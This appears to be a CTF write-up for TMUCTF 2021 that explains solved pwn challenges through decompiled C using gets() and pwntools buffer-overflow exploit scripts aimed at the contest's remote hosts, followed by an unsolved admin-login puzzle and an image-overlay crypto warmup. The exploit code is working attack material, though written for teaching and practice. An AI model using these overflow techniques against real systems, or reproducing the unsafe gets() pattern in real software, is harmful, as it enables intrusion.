intmain() {char local_58 [76];int local_c;setbuf(stdout,(char*)0x0);setbuf(stdin,(char*)0x0);setbuf(stderr,(char*)0x0);tmulogo();puts("Welcome to TMUCTF 2021! Let us know your name: "); local_c =0;gets(local_58);puts("Thanks!\n");if (local_c !=0) {system("cat flag.txt"); }return0;}
Solution
This is the first thing you learn when opening a book for reverse engineering/pwn. A buffer overflow to access the flag.
from pwn import*payload =b"A"*78#binary = process("./warmup")binary =remote("194.5.207.56", 7000)print(binary.recvuntil(bytes("name:", "utf-8")))binary.sendline(payload)binary.interactive()
Flag: TMUCTF{??????}
Baby Pwn [50 pts]
Description
Can you get the flag?
nc 194.5.207.56 7010, nc 185.239.107.54 7010
Decompiled Code
intmain(void) {char name [28];int local_c;setbuf(stdout,(char*)0x0);setbuf(stderr,(char*)0x0);setbuf(stdin,(char*)0x0);tmulogo(); local_c =0;puts("Hi, Please enter your name: ");gets(name);if (local_c ==0xcafe) {helloUser(name); }return0;}
voidhelloUser(undefined8 param_1) {char local_88 [128];printf("Nice to meet you %s!\n",param_1);puts("Tell me about yourself ;;)");gets(local_88);puts("It was a pleasure meeting you.");return;}
Solution
This is a common warmup problem that appears in CTF so I went through it easily. Well sort of. I grabbed some past code and found in the source what I am doing. I did everything right except it wasn't printing out the flag. Later on, another member looked over it and found that my address was completely wrong and that was a simple fix was all it took. The Code is below.
from pwn import*import timeaddr1 =0xcafeflag_os =0x4012f0payload =b"A"*28payload2 =b"A"*128newline =bytes('\n', 'utf-8')#binary = process("./babypwn")binary =remote('194.5.207.56', 7010)print(binary.recvuntil(bytes("name:", "utf-8")))binary.sendline(payload +p64(addr1))# Makes it to Hello Userprint(binary.recvuntil(bytes(")", "utf-8")))# Get to herebinary.sendline(payload2 +p64(flag_os) +p64(flag_os))binary.interactive()
Flag: TMUCTF{??????}
Are you admin [198 pts] [Not Solved]
Description
Just admin can get the flag! Note that the admin likes integers!
from pwn import*user =bytes("AlexTheUser", "utf-8")password =bytes("4l3x7h3p455w0rd", "utf-8")#print(len(p64(flag_address)))#binary = process("./areyouadmin")#binary.close()binary =remote("194.5.207.113", 7020)print(binary.recvuntil(bytes("username:", "utf-8")))binary.sendline(user)print(binary.recvuntil(bytes("password:", "utf-8")))binary.sendline(password)#binary.sendline(payload + p64(flag_address))#binary.interactive()binary.close()print("made it to the numbers")"""top = 233found = Falsei1 = 0i4 = 0i5 = 0while not found: for i2 in range(100, top): for i3 in range(100, top): i1 = (-1 * i3 * i2) + 0x16d3 i4 = (0x37a2 - i2) / i3 # Using New Known i5 = (0x253f - i3) / i4 if (i5 + i2 * i1) == 0x1bc9: print(i1, i2, i3, i4, i5) if (i4 + i1 * i5) == 0x703f: print(i1, i2, i3, i4, i5)"""# 233 30 187 76 123 """ if (((num3 + num5 * num4 == 0x253f)) && (((num2 + num4 * num3 == 0x37a2 && (num1 + num3 * num2 == 0x16d3)) && ((num5 + num2 * num1 == 0x1bc9 && (num4 + num1 * num5 == 0x703f)))))) {""""""top = 100for i1 in range(0 , 100): print(i1) for i2 in range(0 , 10000): for i3 in range(28, 32): for i4 in range(90, 100): for i5 in range(90, 100): if (i3 + i5 * i4 == 9535): if(i2 + i4 * i3 == 14242): print(i2, i3, i4) if(i1 + i3 * i2 == 5843): if (i5 + i2 * i1 == 7113): if (i4 + i1 * i5 == 28735): print(i1, i2, i3, i4, i5)"""# Original Guess = 9535 14242 5843 7113 28735#num1 + num3 * num2 == 0x16d3#num3 + num5 * num4 == 0x253f#num2 + num4 * num3 == 0x37a2#num5 + num2 * num1 == 0x1bc9#num4 + num1 * num5 == 0x703f
Welcome
Warmup [50 pts]
Description
A fun visual cryptography tool will amaze your kids!
Note: Remember the flag format is TMUCTF{...}.
Solution
Notice a small difference in the two file sizes. I was like hmmm let me see what would happen if I combine the images. I overlayed one on top of the other one and got the final image of the flag.
